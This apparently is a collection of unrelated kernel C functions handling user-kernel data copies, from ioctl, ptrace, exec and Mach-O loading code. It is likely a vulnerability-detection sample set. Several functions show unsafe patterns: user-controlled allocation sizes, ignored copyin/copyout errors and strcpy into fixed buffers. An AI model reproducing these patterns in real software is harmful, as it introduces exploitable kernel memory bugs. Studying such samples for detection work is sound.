process_read_xmmregs(t, xmmregs); if (error == 0) error = copyout(xmmregs, SCARG(uap, addr), sizeof(*xmmregs)); free(xmmregs, M_TEMP); return (error); #endif } #ifdef DIAGNOSTIC panic("ptrace: impossible"); #endif return 0; }
static int nand_ioctl(struct disk *ndisk, u_long cmd, void *data, int fflag, struct thread *td) { struct nand_chip *chip; struct nand_oob_rw *oob_rw = NULL; struct nand_raw_rw *raw_rw = NULL; device_t nandbus; uint8_t *buf = NULL; int ret = 0; uint8_t status; chip = (struct nand_chip *)ndisk->d_drv1; nandbus = device_get_parent(chip->dev); if ((cmd == NAND_IO_RAW_READ) || (cmd == NAND_IO_RAW_PROG)) { raw_rw = (struct nand_raw_rw *)data; buf = malloc(raw_rw->len, M_NAND, M_WAITOK); } switch (cmd) { case NAND_IO_ERASE: ret = nand_erase_blocks(chip, ((off_t *)data)[0], ((off_t *)data)[1]); break; case NAND_IO_OOB_READ: oob_rw = (struct nand_oob_rw *)data; ret = nand_oob_access(chip, oob_rw->page, 0, oob_rw->len, oob_rw->data, 0); break; case NAND_IO_OOB_PROG: oob_rw = (struct nand_oob_rw *)data; ret = nand_oob_access(chip, oob_rw->page, 0, oob_rw->len, oob_rw->data, 1); break; case NAND_IO_GET_STATUS: NANDBUS_LOCK(nandbus); ret = NANDBUS_GET_STATUS(nandbus, &status); if (ret == 0) *(uint8_t *)data = status; NANDBUS_UNLOCK(nandbus); break; case NAND_IO_RAW_PROG: copyin(raw_rw->data, buf, raw_rw->len); ret = nand_prog_pages_raw(chip, raw_rw->off, buf, raw_rw->len); break; case NAND_IO_RAW_READ: ret = nand_read_pages_raw(chip, raw_rw->off, buf, raw_rw->len); copyout(buf, raw_rw->data, raw_rw->len); break; case NAND_IO_GET_CHIP_PARAM: nand_get_chip_param(chip, (struct chip_param_io *)data); break; default: printf("Unknown nand_ioctl request \n"); ret = EIO; } if (buf) free(buf, M_NAND); return (ret); }
static load_return_t load_segment( struct load_command *lcp, uint32_t filetype, void * control, off_t pager_offset, off_t macho_size, struct vnode *vp, vm_map_t map, int64_t slide, load_result_t *result ) { struct segment_command_64 segment_command, *scp; kern_return_t ret; vm_map_offset_t map_addr, map_offset; vm_map_size_t map_size, seg_size, delta_size; vm_prot_t initprot; vm_prot_t maxprot; size_t segment_command_size, total_section_size, single_section_size; boolean_t prohibit_pagezero_mapping = FALSE; if (LC_SEGMENT_64 == lcp->cmd) { segment_command_size = sizeof(struct segment_command_64); single_section_size = sizeof(struct section_64); } else { segment_command_size = sizeof(struct segment_command); single_section_size = sizeof(struct section); } if (lcp->cmdsize < segment_command_size) return (LOAD_BADMACHO); total_section_size = lcp->cmdsize - segment_command_size; if (LC_SEGMENT_64 == lcp->cmd) scp = (struct segment_command_64 *)lcp; else { scp = &segment_command; widen_segment_command((struct segment_command *)lcp, scp); } /* * Make sure what we get from the file is really ours (as specified * by macho_size). */ if (scp->fileoff + scp->filesize < scp->fileoff || scp->fileoff + scp->filesize > (uint64_t)macho_size) return (LOAD_BADMACHO); /* * Ensure that the number of sections specified would fit * within the load command size. */ if (total_section_size / single_section_size < scp->nsects) return (LOAD_BADMACHO); /* * Make sure the segment is page-aligned in the file. */ if ((scp->fileoff & PAGE_MASK_64) != 0) return (LOAD_BADMACHO); /* * Round sizes to page size. */ seg_size = round_page_64(scp->vmsize); map_size = round_page_64(scp->filesize); map_addr = trunc_page_64(scp->vmaddr); /* JVXXX note that in XNU TOT this is round instead of trunc for 64 bits */ seg_size = vm_map_round_page(seg_size, vm_map_page_mask(map)); map_size = vm_map_round_page(map_size, vm_map_page_mask(map)); if (seg_size == 0) return (KERN_SUCCESS); if (map_addr == 0 && map_size == 0 && seg_size != 0 && (scp->initprot & VM_PROT_ALL) == VM_PROT_NONE && (scp->maxprot & VM_PROT_ALL) == VM_PROT_NONE) { /* * For PIE, extend page zero rather than moving it. Extending * page zero keeps early allocations from falling predictably * between the end of page zero and the beginning of the first * slid segment. */ seg_size += slide; slide = 0; /* XXX (4596982) this interferes with Rosetta, so limit to 64-bit tasks */ if (scp->cmd == LC_SEGMENT_64) { prohibit_pagezero_mapping = TRUE; } if (prohibit_pagezero_mapping) { /* * This is a "page zero" segment: it starts at address 0, * is not mapped from the binary file and is not accessible. * User-space should never be able to access that memory, so * make it completely off limits by raising the VM map's * minimum offset. */ ret = vm_map_raise_min_offset(map, seg_size); if (ret != KERN_SUCCESS) { return (LOAD_FAILURE); } return (LOAD_SUCCESS); } } /* If a non-zero slide was specified by the caller, apply now */ map_addr += slide; if (map_addr < result->min_vm_addr) result->min_vm_addr = map_addr; if (map_addr+seg_size > result->max_vm_addr) result->max_vm_addr = map_addr+seg_size; if (map == VM_MAP_NULL) return (LOAD_SUCCESS); map_offset = pager_offset + scp->fileoff; /* limited to 32 bits */ if (map_size > 0) { initprot = (scp->initprot) & VM_PROT_ALL; maxprot = (scp->maxprot) & VM_PROT_ALL; /* * Map a copy of the file into the address space. */ ret = vm_map_enter_mem_object_control(map, &map_addr, map_size, (mach_vm_offset_t)0, VM_FLAGS_FIXED, control, map_offset, TRUE, initprot, maxprot, VM_INHERIT_DEFAULT); if (ret != KERN_SUCCESS) { return (LOAD_NOSPACE); } /* * If the file didn't end on a page boundary, * we need to zero the leftover. */ delta_size = map_size - scp->filesize; #if FIXME if (delta_size > 0) { mach_vm_offset_t tmp; ret = mach_vm_allocate(kernel_map, &tmp, delta_size, VM_FLAGS_ANYWHERE); if (ret != KERN_SUCCESS) return(LOAD_RESOURCE); if (copyout(tmp, map_addr + scp->filesize, delta_size)) { (void) mach_vm_deallocate( kernel_map, tmp, delta_size); return (LOAD_FAILURE); } (void) mach_vm_deallocate(kernel_map, tmp, delta_size); } #endif /* FIXME */ } /* * If the virtual size of the segment is greater * than the size from the file, we need to allocate * zero fill memory for the rest. */ delta_size = seg_size - map_size; if (delta_size > 0) { mach_vm_offset_t tmp = map_addr + map_size; ret = mach_vm_map(map, &tmp, delta_size, 0, VM_FLAGS_FIXED, NULL, 0, FALSE, scp->initprot, scp->maxprot, VM_INHERIT_DEFAULT); if (ret != KERN_SUCCESS) return(LOAD_NOSPACE); } if ( (scp->fileoff == 0) && (scp->filesize != 0) ) result->mach_header = map_addr; if (scp->flags & SG_PROTECTED_VERSION_1) { ret = unprotect_segment(scp->fileoff, scp->filesize, vp, pager_offset, map, map_addr, map_size); } else { ret = LOAD_SUCCESS; } if (LOAD_SUCCESS == ret && filetype == MH_DYLINKER && result->all_image_info_addr == MACH_VM_MIN_ADDRESS) note_all_image_info_section(scp, LC_SEGMENT_64 == lcp->cmd, single_section_size, (const char *)lcp + segment_command_size, slide, result); if ((result->entry_point >= map_addr) && (result->entry_point < (map_addr + map_size))) result->validentry = 1; return ret; }
/* * Handle ioctl requests from the diagnostic interface. * * The initial part of this code resembles ath_ioctl_diag(); * it's likely a good idea to reduce duplication between * these two routines. */ int ath_ioctl_phyerr(struct ath_softc *sc, struct ath_diag *ad) { unsigned int id = ad->ad_id & ATH_DIAG_ID; void *indata = NULL; void *outdata = NULL; u_int32_t insize = ad->ad_in_size; u_int32_t outsize = ad->ad_out_size; int error = 0; HAL_PHYERR_PARAM peout; HAL_PHYERR_PARAM *pe; if (ad->ad_id & ATH_DIAG_IN) { /* * Copy in data. */ indata = malloc(insize, M_TEMP, M_NOWAIT); if (indata == NULL) { error = ENOMEM; goto bad; } error = copyin(ad->ad_in_data, indata, insize); if (error) goto bad; } if (ad->ad_id & ATH_DIAG_DYN) { /* * Allocate a buffer for the results (otherwise the HAL * returns a pointer to a buffer where we can read the * results). Note that we depend on the HAL leaving this * pointer for us to use below in reclaiming the buffer; * may want to be more defensive. */ outdata = malloc(outsize, M_TEMP, M_NOWAIT); if (outdata == NULL) { error = ENOMEM; goto bad; } } switch (id) { case DFS_SET_THRESH: if (insize < sizeof(HAL_PHYERR_PARAM)) { error = EINVAL; break; } pe = (HAL_PHYERR_PARAM *) indata; ath_hal_enabledfs(sc->sc_ah, pe); break; case DFS_GET_THRESH: memset(&peout, 0, sizeof(peout)); outsize = sizeof(HAL_PHYERR_PARAM); ath_hal_getdfsthresh(sc->sc_ah, &peout); pe = (HAL_PHYERR_PARAM *) outdata; memcpy(pe, &peout, sizeof(*pe)); break; default: error = EINVAL; } if (outsize < ad->ad_out_size) ad->ad_out_size = outsize; if (outdata && copyout(outdata, ad->ad_out_data, ad->ad_out_size)) error = EFAULT; bad: if ((ad->ad_id & ATH_DIAG_IN) && indata != NULL) free(indata, M_TEMP); if ((ad->ad_id & ATH_DIAG_DYN) && outdata != NULL) free(outdata, M_TEMP); return error; }
int patm_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct ifreq *ifr = (struct ifreq *)data; struct ifaddr *ifa = (struct ifaddr *)data; struct patm_softc *sc = ifp->if_softc; int error = 0; uint32_t cfg; struct atmio_vcctable *vtab; switch (cmd) { case SIOCSIFADDR: mtx_lock(&sc->mtx); ifp->if_flags |= IFF_UP; if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) patm_initialize(sc); switch (ifa->ifa_addr->sa_family) { #ifdef INET case AF_INET: case AF_INET6: ifa->ifa_rtrequest = atm_rtrequest; break; #endif default: break; } mtx_unlock(&sc->mtx); break; case SIOCSIFFLAGS: mtx_lock(&sc->mtx); if (ifp->if_flags & IFF_UP) { if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { patm_initialize(sc); } } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING) { patm_stop(sc); } } mtx_unlock(&sc->mtx); break; case SIOCGIFMEDIA: case SIOCSIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &sc->media, cmd); /* * We need to toggle unassigned/idle cells ourself because * the 77252 generates null cells for spacing. When switching * null cells of it gets the timing wrong. */ mtx_lock(&sc->mtx); if (ifp->if_drv_flags & IFF_DRV_RUNNING) { if (sc->utopia.state & UTP_ST_UNASS) { if (!(sc->flags & PATM_UNASS)) { cfg = patm_nor_read(sc, IDT_NOR_CFG); cfg &= ~IDT_CFG_IDLECLP; patm_nor_write(sc, IDT_NOR_CFG, cfg); sc->flags |= PATM_UNASS; } } else { if (sc->flags & PATM_UNASS) { cfg = patm_nor_read(sc, IDT_NOR_CFG); cfg |= IDT_CFG_IDLECLP; patm_nor_write(sc, IDT_NOR_CFG, cfg); sc->flags &= ~PATM_UNASS; } } } else { if (sc->utopia.state & UTP_ST_UNASS) sc->flags |= PATM_UNASS; else sc->flags &= ~PATM_UNASS; } mtx_unlock(&sc->mtx); break; case SIOCSIFMTU: /* * Set the interface MTU. */ if (ifr->ifr_mtu > ATMMTU) error = EINVAL; else ifp->if_mtu = ifr->ifr_mtu; break; case SIOCATMOPENVCC: /* kernel internal use */ error = patm_open_vcc(sc, (struct atmio_openvcc *)data); break; case SIOCATMCLOSEVCC: /* kernel internal use */ error = patm_close_vcc(sc, (struct atmio_closevcc *)data); break; case SIOCATMGVCCS: /* external use */ #ifdef CPU_CHERI #error Unvalidatable ifr_data use. Unsafe with CheriABI. #endif /* return vcc table */ vtab = atm_getvccs((struct atmio_vcc **)sc->vccs, sc->mmap->max_conn, sc->vccs_open, &sc->mtx, 1); error = copyout(vtab, ifr->ifr_data, sizeof(*vtab) + vtab->count * sizeof(vtab->vccs[0])); free(vtab, M_DEVBUF); break; case SIOCATMGETVCCS: /* netgraph internal use */ vtab = atm_getvccs((struct atmio_vcc **)sc->vccs, sc->mmap->max_conn, sc->vccs_open, &sc->mtx, 0); if (vtab == NULL) { error = ENOMEM; break; } *(void **)data = vtab; break; default: patm_debug(sc, IOCTL, "unknown cmd=%08lx arg=%p", cmd, data); error = EINVAL; break; } return (error); }
int exec(char *path, char **argv) { char *s, *last; int i, off; uint argc, sz, sp, ustack[3+MAXARG+1]; struct elfhdr elf; struct inode *ip; struct proghdr ph; pde_t *pgdir, *oldpgdir; begin_op(); if((ip = namei(path)) == 0){ end_op(); return -1; } ilock(ip); pgdir = 0; // Check ELF header if(readi(ip, (char*)&elf, 0, sizeof(elf)) < sizeof(elf)) goto bad; if(elf.magic != ELF_MAGIC) goto bad; if((pgdir = setupkvm()) == 0) goto bad; // Load program into memory. sz = 0; for(i=0, off=elf.phoff; i<elf.phnum; i++, off+=sizeof(ph)){ if(readi(ip, (char*)&ph, off, sizeof(ph)) != sizeof(ph)) goto bad; if(ph.type != ELF_PROG_LOAD) continue; if(ph.memsz < ph.filesz) goto bad; if((sz = allocuvm(pgdir, sz, ph.vaddr + ph.memsz)) == 0) goto bad; if(loaduvm(pgdir, (char*)ph.vaddr, ip, ph.off, ph.filesz) < 0) goto bad; } iunlockput(ip); end_op(); ip = 0; // Allocate two pages at the next page boundary. // Make the first inaccessible. Use the second as the user stack. sz = PGROUNDUP(sz); if((sz = allocuvm(pgdir, sz, sz + 2*PGSIZE)) == 0) goto bad; clearpteu(pgdir, (char*)(sz - 2*PGSIZE)); sp = sz; // Push argument strings, prepare rest of stack in ustack. for(argc = 0; argv[argc]; argc++) { if(argc >= MAXARG) goto bad; sp = (sp - (strlen(argv[argc]) + 1)) & ~3; if(copyout(pgdir, sp, argv[argc], strlen(argv[argc]) + 1) < 0) goto bad; ustack[3+argc] = sp; } ustack[3+argc] = 0; ustack[0] = 0xffffffff; // fake return PC ustack[1] = argc; ustack[2] = sp - (argc+1)*4; // argv pointer sp -= (3+argc+1) * 4; if(copyout(pgdir, sp, ustack, (3+argc+1)*4) < 0) goto bad; // Save program name for debugging. for(last=s=path; *s; s++) if(*s == '/') last = s+1; safestrcpy(proc->name, last, sizeof(proc->name)); // Commit to the user image. oldpgdir = proc->pgdir; proc->pgdir = pgdir; proc->sz = sz; proc->tf->eip = elf.entry; // main proc->tf->esp = sp; proc->signal = (void*) -1; //when exe put -1 in signals switchuvm(proc); freevm(oldpgdir); return 0; bad: if(pgdir) freevm(pgdir); if(ip){ iunlockput(ip); end_op(); } return -1; }
IOReturn USERCLIENT_KEXT_CLASSNAME::callback_synchronized_communication(const BridgeUserClientStruct* inputdata, uint64_t* outputdata) { KEXT_NAMESPACE::GlobalLock::ScopedLock lk; if (! lk) return kIOReturnCannotLock; IOReturn result = kIOReturnError; uint8_t* buffer = NULL; size_t size = 0; if (! inputdata || ! outputdata) { result = kIOReturnBadArgument; IOLOG_ERROR("UserClient_kext::callback_synchronized_communication kIOReturnBadArgument\n"); goto finish; } if (provider_ == NULL || isInactive()) { // Return an error if we don't have a provider. This could happen if the user process // called callback_synchronized_communication without calling IOServiceOpen first. // Or, the user client could be in the process of being terminated and is thus inactive. result = kIOReturnNotAttached; IOLOG_ERROR("UserClient_kext::callback_synchronized_communication kIOReturnNotAttached\n"); goto finish; } if (! provider_->isOpen(this)) { // Return an error if we do not have the driver open. This could happen if the user process // did not call callback_open before calling this function. result = kIOReturnNotOpen; IOLOG_ERROR("UserClient_kext::callback_synchronized_communication kIOReturnNotOpen\n"); goto finish; } size = static_cast<size_t>(inputdata->size); if (size == 0) { IOLOG_ERROR("callback_synchronized_communication size == 0\n"); goto finish; } buffer = new uint8_t[size]; if (! buffer) { IOLOG_ERROR("callback_synchronized_communication buffer is null\n"); goto finish; } if (copyin(inputdata->data, buffer, size) != 0) { IOLOG_ERROR("callback_synchronized_communication copyin is failed.\n"); goto finish; } handle_synchronized_communication(inputdata->type, inputdata->option, buffer, size, outputdata); if (copyout(buffer, inputdata->data, size) != 0) { IOLOG_ERROR("callback_synchronized_communication copyout is failed.\n"); goto finish; } result = kIOReturnSuccess; finish: if (buffer) { delete[] buffer; buffer = NULL; } return result; }
static int cpu_ptrace_xstate(struct thread *td, int req, void *addr, int data) { struct ptrace_xstate_info info; char *savefpu; int error; if (!use_xsave) return (EOPNOTSUPP); switch (req) { case PT_GETXSTATE_OLD: npxgetregs(td); savefpu = (char *)(get_pcb_user_save_td(td) + 1); error = copyout(savefpu, addr, cpu_max_ext_state_size - sizeof(union savefpu)); break; case PT_SETXSTATE_OLD: if (data > cpu_max_ext_state_size - sizeof(union savefpu)) { error = EINVAL; break; } savefpu = malloc(data, M_TEMP, M_WAITOK); error = copyin(addr, savefpu, data); if (error == 0) { npxgetregs(td); error = npxsetxstate(td, savefpu, data); } free(savefpu, M_TEMP); break; case PT_GETXSTATE_INFO: if (data != sizeof(info)) { error = EINVAL; break; } info.xsave_len = cpu_max_ext_state_size; info.xsave_mask = xsave_mask; error = copyout(&info, addr, data); break; case PT_GETXSTATE: npxgetregs(td); savefpu = (char *)(get_pcb_user_save_td(td)); error = copyout(savefpu, addr, cpu_max_ext_state_size); break; case PT_SETXSTATE: if (data < sizeof(union savefpu) || data > cpu_max_ext_state_size) { error = EINVAL; break; } savefpu = malloc(data, M_TEMP, M_WAITOK); error = copyin(addr, savefpu, data); if (error == 0) error = npxsetregs(td, (union savefpu *)savefpu, savefpu + sizeof(union savefpu), data - sizeof(union savefpu)); free(savefpu, M_TEMP); break; default: error = EINVAL; break; } return (error); }
int svr4_32_copyargs(struct lwp *l, struct exec_package *pack, struct ps_strings *arginfo, char **stackp, void *argp) { size_t len; AuxInfo ai[SVR4_32_AUX_ARGSIZ], *a, *platform=NULL, *exec=NULL; struct elf_args *ap; extern char machine_model[]; int error; if ((error = netbsd32_copyargs(l, pack, arginfo, stackp, argp)) != 0) return error; a = ai; /* * Push extra arguments on the stack needed by dynamically * linked binaries */ if ((ap = (struct elf_args *)pack->ep_emul_arg)) { struct proc *p = curproc; /* XXXXX */ a->a_type = AT_SUN_PLATFORM; platform = a; /* Patch this later. */ a++; if (pack->ep_ndp->ni_cnd.cn_flags & HASBUF) { a->a_type = AT_SUN_EXECNAME; exec = a; /* Patch this later. */ a++; } a->a_type = AT_PHDR; a->a_v = ap->arg_phaddr; a++; a->a_type = AT_PHENT; a->a_v = ap->arg_phentsize; a++; a->a_type = AT_PHNUM; a->a_v = ap->arg_phnum; a++; a->a_type = AT_ENTRY; a->a_v = ap->arg_entry; a++; a->a_type = AT_BASE; a->a_v = ap->arg_interp; a++; if (sun_flags) { a->a_type = AT_FLAGS; a->a_v = sun_flags; a++; } a->a_type = AT_PAGESZ; a->a_v = PAGE_SIZE; a++; a->a_type = AT_EUID; a->a_v = kauth_cred_geteuid(l->l_cred); a++; a->a_type = AT_RUID; a->a_v = kauth_cred_getuid(l->l_cred); a++; a->a_type = AT_EGID; a->a_v = kauth_cred_getegid(l->l_cred); a++; a->a_type = AT_RGID; a->a_v = kauth_cred_getgid(l->l_cred); a++; if (sun_hwcap) { a->a_type = AT_SUN_HWCAP; a->a_v = sun_hwcap; a++; } free((char *)ap, M_TEMP); pack->ep_emul_arg = NULL; } a->a_type = AT_NULL; a->a_v = 0; a++; len = (a - ai) * sizeof(AuxInfo); if (platform) { char *ptr = (char *)a; const char *path = NULL; /* Copy out the platform name. */ platform->a_v = (u_long)(*stackp) + len; /* XXXX extremely inefficient.... */ strcpy(ptr, machine_model); ptr += strlen(machine_model) + 1; len += strlen(machine_model) + 1; if (exec) { path = pack->ep_ndp->ni_cnd.cn_pnbuf; /* Copy out the file we're executing. */ exec->a_v = (u_long)(*stackp) + len; strcpy(ptr, path); len += strlen(ptr)+1; } /* Round to 32-bits */ len = (len+7)&~0x7L; } if ((error = copyout(ai, *stackp, len)) != 0) return error; *stackp += len; return error; }